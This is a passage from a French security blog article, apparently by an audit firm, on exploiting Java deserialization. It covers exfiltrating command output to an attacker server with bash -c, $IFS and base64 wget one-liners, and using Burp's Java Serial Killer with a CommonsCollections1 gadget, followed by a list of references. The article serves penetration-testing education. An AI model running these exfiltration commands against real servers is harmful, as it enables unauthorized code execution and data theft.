Par conséquent, les commandes sont invoquées sans avoir de shell parent, ce qui limite rapidement les actions… Mais on peut appeler un shell bash via Apache Commons exec via la commande bash -c.

Toutefois, Apache Commons exec parse les commandes en gérant très mal les espaces… Pour résoudre ce problème, on peut utiliser 2 approches :

Utiliser les fonctions de manipulation de chaîne en bash. Par exemple, cette commande charge le résultat en base64 de la commande echo yoloswag dans la variable c, qui est ensuite ajoutée au chemin de la requête wget :

bash -c c=`{echo,yoloswag}|base64`&&{wget,ip_attaquant/$c}’

Il est aussi possible d’utiliser la variable $IFS (séparateur de champs interne) à la place des espaces dans la commande transmise à Bash. Ici pour lancer un uname -a :

bash –c wget$IFSip_attaquant/`uname$IFS-a|base64`

Dernier point important : il peut être nécessaire d’échapper les barres obliques et les signes dollar dans certaines situations, tout dépend de la charge utile et des fonctions touchées.

Ici, avec une machine d’audit ayant pour IP 54.161.175.139 :

Le résultat côté serveur web sur la machine d’audit est le suivant :

Une requête depuis l’IP du serveur cible apparaît, vers une URL encodée en base64 et qui correspond à la sortie de la commande « uname -a ».

En effet, après une extraction de la donnée et son décodage base64 par la commande suivante :

tail -n1 access.log | cut -d/ -f4 | cut ‘d’’ -f1 | base64 -d

Le résultat suivant apparaît :

Vous avez donc exécuté une commande uname -a avec succès sur le serveur cible : vous êtes désormais un serial hacker accompli !

Le maître deserializateur veut vous serrer la main

Méthode 3 : Java Serial Killer

À la suite de la phase de détection, nous savons qu’une charge utile (gadget) forgé pour CommonsCollections1 fonctionne contre notre cible.

Vous pouvez alors utiliser l’extension Burp Java Serial Killer ; un clic-droit sur une requête POST contenant un objet Java sérialisé dans le body permet de l’envoyer à l’extension :

Allez ensuite dans l’onglet Burp « Java Serial Killer » :

Cet onglet prend en entrée :

Une commande à exécuter sur le serveur cible
La librairie vulnérable à exploiter

Par exemple, pour envoyer une requête ping à wavestone.com en utilisant le type de charge utile CommonsCollections1, car nous savons qu’elle fonctionne suite à la phase de détection :

Il est aussi possible d’encoder la charge en Base64, si c’est le format attendu par le serveur (voir la petite checkbox à droite de « Serialize »).

Conclusion

Vous avez désormais les bases théoriques permettant de comprendre les vulnérabilités liées à la désérialisation en Java, et les techniques et outillages pratiques permettant de les exploiter dans les librairies les plus connues, sans connaissance préalable du code applicatif.

Toutefois, il est à garder en tête que ces librairies ne sont pas utilisées dans 100% des cas de désérialisation, comme vu dans le chapitre « Exemple d’attaque : Compromission de compte utilisateur », où la vulnérabilité exploitée n’impliquait d’ailleurs même pas l’envoi de code au serveur à exécuter. Les exploits plus spécifiques reposent donc énormément sur la connaissance du code (ou l’ingénierie inverse sur ce code) qui peut être manipulé par désérialisation. D’où beaucoup de difficultés à exploiter les vulnérabilités de type désérialisation malgré l’impact parfois colossal de ce type de failles.

Par ailleurs, la sérialisation/désérialisation n’est pas un concept exclusif à Java, et se retrouve dans de nombreux autres langages de programmation, notamment :

Python : pickling / unpickling
PHP : serializing / deserializing
Ruby : marshalling / unmarshalling
…

La méthodologie globale reste la même, mais les outils peuvent varier (Freddy à la place de ysoserial pour les moteurs de désérialisation XML par exemple…).

La cheatsheet suivante peut donner de bonnes pistes d’audit pour ces autres langages et technologies :

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md.

Sources et références pour approfondir le sujet

Article Nytro sur la désérialisation Java

https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/

Article de Synopsys expliquant comment exfiltrer de la donnée via la désérialisation Java et contourner les principales limitations techniques que l’on peut rencontrer

https://www.synopsys.com/content/dam/synopsys/sig-assets/whitepapers/exploiting-the-java-deserialization-vulnerability.pdf

Cheatsheet pour la désérialisation Java

https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet

La désérialisation Java avec Burp

https://blog.netspi.com/java-deserialization-attacks-burp/

Article complet expliquant la désérialisation Java et listant plusieurs outils dédiés

https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/

Liste de recommandations sur l’usage de la désérialisation pour divers langages

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md

Support d’un talk d’Insomnia sur la désérialisation pour plusieurs langages à l’OWASP New Zealand Day 2016

https://insomniasec.com/cdn-assets/Deserialization_-__What_Could_Go_Wrong.pdf

Exploitation de vulnérabilités de désérialisation Java dans des environnements sécurisés (systèmes avec pare-feu, Java mis à jour)

https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html

Exploiter la désérialisation Java en aveugle avec Burp et Ysoserial

https://www.n00py.io/2017/11/exploiting-blind-java-deserialization-with-burp-and-ysoserial/

Write-up du challenge Webgoat 8 (application d’entraînement développée par l’OWASP) d’exploitation d’une vulnérabilité de désérialisation non sécurisée

https://medium.com/abn-amro-red-team/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef

Article d’un reverse engineer de Tenable expliquant l’analyse de la CVE-2016-3737, et l’écriture de gadgets pour Jython

https://fr.tenable.com/blog/expanding-on-a-known-vulnerability-attacking-with-jython

Cours Java sur l’implémentation d’une classe sérialisable

http://www.javapractices.com/topic/TopicAction.do?Id=45

Support d’un talk d’Alvaro Munoz (@pwntester) et Christian Schneider (@cschneider4711) à l’OWASP AppSecEU 2016 sur les vulnérabilités de désérialisation de la JVM et comment s’en protéger

https://fr.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016

Support d’un talk de Chris Frohoff (@frohoff) et Gabriel Lawrence (@gebl) à l’OWASP San Diego sur la désérialisation Java

https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization

Analyse de l’attaque d’Equifax (143 millions de clients touchés aux USA) en 2017 par @brandur, reposant sur le chaînage de gadgets

https://brandur.org/fragments/gadgets-and-chains

Support d’un talk de Matthias Kaiser (@matthias_kaiser) à la HackPra WS 2015 sur l’exploitation de vulnérabilités de désérialisation non-sécurisée

https://fr.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478

Article de Ian Haken sur la découverte automatisée de chaînes de gadgets, notamment avec Gadget Inspector

https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains-wp.pdf

Article de @breenmachine de 2015 sur la désérialisation Java dans plusieurs technologies du marché et détail de 5 exploits (websphere, jboss, jenkins, weblogic et openNMS)

https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/

Cet article Techniques et outils d’attaque sur les moteurs de désérialisation (Java) est apparu en premier sur RiskInsight.